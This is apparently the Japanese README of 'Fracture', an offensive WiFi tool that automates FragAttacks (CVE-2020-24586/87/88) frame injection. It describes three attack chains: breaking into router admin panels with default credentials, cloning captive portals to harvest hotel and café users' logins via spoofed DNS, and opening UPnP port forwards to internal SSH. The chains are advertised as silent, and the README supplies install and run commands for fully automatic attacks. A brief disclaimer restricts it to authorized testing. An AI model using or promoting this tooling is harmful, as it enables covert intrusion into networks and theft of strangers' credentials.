
FragAttacks WiFiペネトレーションフレームワーク — CVE-2020-24586/87/88
FragAttacks WiFiペネトレーションフレームワーク
CVE-2020-24586 / CVE-2020-24587 / CVE-2020-24588
Fractureは、802.11フレームインジェクションによる3つの新しい攻撃チェーンを自動化します。WPA2/WPA3のA-MSDUアグリゲーションの脆弱性を悪用して、暗号化されたネットワークに任意の平文フレームを注入します — パスワードを知らなくても。
許可されたペネトレーションテスト専用です。所有しているネットワーク、または明示的な書面によるテスト許可を得たネットワークに対してのみ使用してください。
802.11 QoS ControlのA-MSDU存在フラグは、CCMP/GCMP認証の対象外です。細工したフレームでこのフラグを設定することで、攻撃者は受信側にペイロードを内部イーサネットフレームとして解釈させ、暗号化を完全にバイパスします。
Fractureはこのプリミティブを利用して、次の3つの攻撃経路を実行します:
ネットワーク外部から、ルーターの管理インターフェース(192.168.x.1および一般的なバリアント)に直接HTTPリクエストを注入します。TP-Link、D-Link、Netgear、ASUSファームウェアに対して、デフォルト認証情報と既知の未認証CVEエンドポイントを試行します。サイレント — deauthなし、検出可能なシグネチャなし。
キャプティブポータルネットワークを検出し、ポータルページをクローンしてから、偽装したDNSレスポンスを注入して接続中のクライアントをリダイレクトします。クライアントがクローンに認証情報を送信すると、Fractureはそれを取得し、正規の認証に使用します。ホテルのWiFi、企業のゲストネットワーク、カフェのホットスポットを標的にします。
UPnP SSDPディスカバリとSOAP AddPortMappingコマンドを注入します。ほとんどの家庭用ルーターはこれらを認証なしで受け入れます。成功すると、ルーターのWANインターフェースに外部ポートを開き、内部クライアントのSSHに転送します — WiFiパスワードに一切触れることなく、どこからでもインバウンドアクセスを提供します。
sudo apt install python3-scapy python3-requests python3-bs4 python3-flask
git clone https://github.com/fracture-wifi/fracture
cd fracture
sudo pip3 install -e . --break-system-packages
インストール後、fractureはシステムコマンドとして利用可能になります。
# Put adapter in monitor mode first
sudo iwconfig wlan1 mode monitor
# Full auto — scan, select target, run all applicable paths
sudo fracture -i wlan1
# Scan only — no attacks
sudo fracture -i wlan1 --scan-only
# Lock to a specific target
sudo fracture -i wlan1 -t AA:BB:CC:DD:EE:FF
# Force a specific path
sudo fracture -i wlan1 --path 1 # router admin
sudo fracture -i wlan1 --path 2 # portal harvest
sudo fracture -i wlan1 --path 3 # UPnP
# Verbose injection log
sudo fracture -i wlan1 -v
# Detailed help
sudo fracture --about
| 対象 | 理由 |
|---|---|
| ホームルーター(TP-Link、D-Link、Netgear、ASUS) | 標準ファームウェア、デフォルト認証情報、UPnP有効 |
| IoTデバイス | 2021年以降ほぼパッチ適用なし |
| キャプティブポータルネットワーク |
エンタープライズ機器(Cisco、Aruba、Ruckus、Ubiquiti)は一般的にパッチ適用済みです。
fracture/
├── fracture/
│ ├── __init__.py version, metadata
│ ├── __main__.py entry point, orchestration
│ ├── tui.py terminal UI, colors, tables
│ ├── scanner.py channel-hopping AP/client discovery
│ ├── injector.py FragAttacks frame engine (CVE-2020-24588)
│ ├── portal.py portal detection, cloning, credential server
│ └── paths.py the three attack chains
├── setup.py
└── README.md
MIT
| 認証情報入力を前提としたホテル/カフェのWiFi |
| Linuxカーネル < 5.12.4 | パッチ適用前のカーネル |
| Windows 2021年6月以前 | パッチ適用前のOS |